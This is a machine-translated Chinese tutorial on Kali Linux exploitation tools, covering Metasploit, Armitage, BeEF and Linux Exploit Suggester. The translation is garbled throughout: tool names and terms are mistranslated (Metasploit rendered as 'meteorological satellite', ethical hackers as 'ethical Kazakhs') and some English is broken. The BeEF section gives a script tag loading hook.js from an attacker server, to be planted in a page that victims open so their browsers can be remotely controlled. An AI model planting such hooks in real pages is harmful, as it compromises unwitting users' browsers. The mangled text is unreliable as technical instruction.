Kap Linux - Exploitation Tools

作为一名道德的哈萨克人,你将使用“Kap Ditribution”,该表含有Metasploit社区版本,以及其他一些通过节省安装时间而非常舒适的道德习惯工具。 然而,如果你想要安装一个单独的工具,则可以在像Ltino、Windows和OS X这样的操作系统中安装。

第一,在加里开放梅塔·科塞莱。 然后,再到应用——开发工具——Metasploit。

在开始后,你将看到以下屏幕,即Metasploit的版本在红色上得到强调。

在青少年中,如果你使用帮助或帮助? 页: 1 你们可以根据你们的需要和你将使用的东西选择。

另一项重要的行政指挥是.msfupdate。 这有助于通过利用最近的脆弱性来更新气象卫星。 在奥洛尔岛进行这一指挥之后,你将不得不等几分钟,直到更新工作完成。

它有一个称为“等级”的良好指挥,你可以用来找到你在以下屏幕上显示的希望。 例如,我想找到与微软有关的开发,而指挥可以是msf >search name:Microsoft category:exploit。

在“研究”是指挥的情况下,“名称”是我们所研究对象的名称,“类型”是我们所寻求的描述。

另一指挥部是“信息”。 报告提供了关于使用该模块或平台的信息,谁是作者、脆弱性参考以及该模块的载荷限制。

Armitage

用于气象的军备总指挥部是用于气象的辅助工具。 它直观目标,建议利用,并暴露先进的开发后特征。

让我们开放,但首先应当开放和启动。 开放军械库,去申请——开发工具——军火。

页: 1

在开放时,你将看到以下屏幕。

武器使用方便。 “目标”区罗列了你发现的所有机器,而且你正在与这些机器合作, ha落的目标与stor底相重。

在你打垮了目标之后,你可以正确点击,继续探讨你需要做些什么,例如探索(浏览)夹。

在以下全球倡议中,你将看到被称作“圣杯”的夹眼。 仅仅通过点击手,你就可以在不需要美术指挥的情况下通过手套进行航行。

在《全球倡议》右边,是列出脆弱性模块的章节。

BeEF

BeEF 代表Browser Exploitation Framework。 这是一个以网络浏览器为重点的渗透测试工具。 职业渗透检测器可使用客户方攻击病媒评估目标环境的实际安全态势。

第一,你必须利用以下指挥系统更新加里一揽子计划:

root@kap:/# apt-get update  
root@kap:/# apt-get install beef-xss 

开始使用以下指挥系统:

root@kap:/# cd /usr/share/beef-xss  
root@kap:/# ./beef 

开放浏览器并进入用户名和密码:beef。

The BeEF hook is a Javacast fileshop on the BeEF services, that needs toî onuser browsers. 当它这样做时,它就向BeEF服务器发出呼吁,告知有关目标的许多信息。 它还使更多的指挥和单元与目标背道而驰。 例如,BeEF。 h 见http://192.168.1.101:3000/hook.js。

为了攻击一个浏览器,将Java语放在客户认为的网页上。 这样做有多种方法,但最容易的是将以下内容插入一页,让客户开放。

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script> 

页面负荷过后,又回到贝EF控制小组,在左上点点击“在线浏览器”。 在几秒之后,你应当看到你代表一个被忽略的浏览器的IP地址。 接管知识产权将迅速提供信息,如浏览器版本、操作系统和安装的原始产品。

遥控指挥,点击“拥有”的东道方。 然后,在指挥部上点击了你想要执行的单元,最后点击“Execute”。

Linux Exploit Suggester

它建议,鉴于第`auname -r'号的六氯环己烷操作系统,可能进行开采。

a. 指挥:

root@kap:/usr/share/pnux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

3.0.0是我们希望加以利用的欧伦托式版。